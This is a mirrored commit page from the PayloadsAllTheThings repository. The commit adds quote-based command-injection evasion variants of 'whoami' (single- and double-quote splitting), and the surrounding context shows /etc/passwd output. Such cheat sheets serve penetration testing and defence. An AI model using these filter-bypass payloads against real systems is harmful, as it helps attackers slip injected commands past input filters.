mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-13 00:17:17 +00:00
update quote evasion payloads
This commit is contained in:
parent
80707e805b
commit
77f83c18b3
1 changed files with 2 additions and 0 deletions
|
@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash
|
|||
```powershell
|
||||
w'h'o'am'i
|
||||
wh''oami
|
||||
'w'hoami
|
||||
```
|
||||
|
||||
#### Bypass with double quote
|
||||
|
@ -273,6 +274,7 @@ wh''oami
|
|||
```powershell
|
||||
w"h"o"am"i
|
||||
wh""oami
|
||||
"wh"oami
|
||||
```
|
||||
|
||||
#### Bypass with backticks
|
||||
|
|
Loading…
Reference in a new issue